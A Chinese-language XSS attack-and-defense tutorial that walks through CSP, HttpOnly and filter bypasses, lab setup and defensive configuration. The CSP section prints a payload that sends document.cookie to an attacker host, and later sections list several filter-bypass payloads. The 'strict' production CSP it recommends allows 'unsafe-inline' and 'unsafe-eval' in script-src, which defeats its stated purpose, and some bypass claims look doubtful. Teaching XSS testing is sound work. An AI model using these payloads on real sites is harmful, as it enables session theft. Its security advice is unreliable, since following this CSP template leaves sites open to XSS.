56：XSS攻防博弈：从CSP策略到Filter绕过的实战推演

1. XSS攻防的本质：一场永不停歇的猫鼠游戏

记得我第一次在CTF比赛中遇到XSS题目时，那种既兴奋又困惑的感觉至今难忘。当时我对着一个看似普通的评论框，反复尝试各种<script>标签却总是失败。直到后来才发现，原来目标网站启用了CSP策略和关键词过滤——这就是现代Web安全中典型的XSS攻防场景。

XSS（跨站脚本攻击）之所以成为OWASP Top 10的常客，根本原因在于它的动态对抗特性。防御方部署CSP、HttpOnly、Filter三层防御，攻击者就研究各种绕过技巧；当防御方升级过滤规则，攻击者又发明新的编码变形方法。这种博弈就像下棋，需要预判对方的下一步行动。

在真实渗透测试中，我总结出XSS攻击的四个关键阶段：

1. 侦察阶段：用curl -I查看响应头，确认是否存在CSP策略
2. 探测阶段：注入基础payload如<img src=x onerror=alert(1)>测试过滤规则
3. 分析阶段：通过浏览器开发者工具观察payload被如何处理
4. 绕过阶段：根据防御措施选择对应的绕过技术栈

2. 拆解防御体系：三大核心机制的工作原理

2.1 CSP策略的攻防实战

去年审计某电商网站时，我发现其CSP配置存在典型错误：

Content-Security-Policy: script-src 'self' *.trusted-cdn.com; img-src *

这个配置有两个致命缺陷：一是img-src使用通配符，二是trusted-cdn.com子域名存在文件上传漏洞。最终我的绕过方案是：

<img src="1" onerror="fetch('https://attacker.com/?c='+document.cookie)">

CSP绕过的高级技巧：

• 利用AngularJS等框架的CSP兼容模式
• 通过DNS预加载泄露数据（需Chrome<85版本）
• 使用Service Worker绕过script-src限制（需同源已有SW）

2.2 HttpOnly的真实防护效果

在银行系统渗透测试中，即使发现XSS漏洞，HttpOnly属性也经常让攻击者无功而返。但实战中我发现几个有趣现象：

• 某些框架错误地在客户端设置HttpOnly Cookie
• 通过DOM-based XSS可以修改Cookie影响会话
• 子域名间的Cookie隔离不彻底可能导致越权

判断HttpOnly最可靠的方法是：

curl -Isk https://target.com | grep -i set-cookie

2.3 Filter绕过的艺术

某次众测遇到一个过滤<script>但允许HTML5标签的网站，最终通过SVG标签成功绕过：

<svg/onload=alert(document.domain)>

Filter绕过的进阶思路：

1. 利用浏览器解析差异：

<scr<script>ipt>alert(1)</scr</script>ipt>

2. CSS注入转XSS：

<style>@import url("javascript:alert(1)");</style>

3. 动态属性构造：

document.body.setAttribute('on'+'click','al'+'ert(1)')

3. 构建完整攻击链：从信息收集到漏洞利用

3.1 靶场环境搭建技巧

建议使用Docker快速搭建包含以下漏洞模式的练习环境：

FROM vulnerables/web-dvwa RUN echo "Header set Content-Security-Policy \"default-src 'self'\"" >> /etc/apache2/apache2.conf

3.2 自动化探测方案

结合XSStrike和自定义字典实现高效探测：

python3 xsstrike.py -u "https://target.com/search?q=fuzz" --skip

推荐的自定义字典应包含：

• 最新HTML5事件处理器（如onpointerenter）
• 少见的编码方式（如UTF-7）
• 冷门标签（如<details ontoggle>）

4. 防御者的进阶策略

4.1 CSP的严格模式配置

推荐的生产环境配置模板：

Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-inline' 'unsafe-eval' 'report-sample'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none'; report-uri /csp-report

4.2 深度防御实施方案

1. 输入验证：

from bleach import clean clean(user_input, tags=[], attributes={}, styles=[], protocols=[])

2. 输出编码：

function encodeForHTML(text) { return text.replace(/&/g, "&amp;") .replace(/</g, "&lt;") .replace(/>/g, "&gt;") .replace(/"/g, "&quot;") .replace(/'/g, "&#x27;"); }

3. 监控体系：

• 部署基于机器学习的异常请求检测
• 建立CSP违规报告分析流程
• 实现自动化XSS Payload特征库更新

在最近一次金融行业红队行动中，我们发现即使是最严格的CSP配置，也可能被WebSocket通信绕过。这再次印证了安全防御需要持续迭代——昨天有效的方案，明天可能就会失效。真正的安全不在于绝对防御，而在于建立快速检测和响应的能力。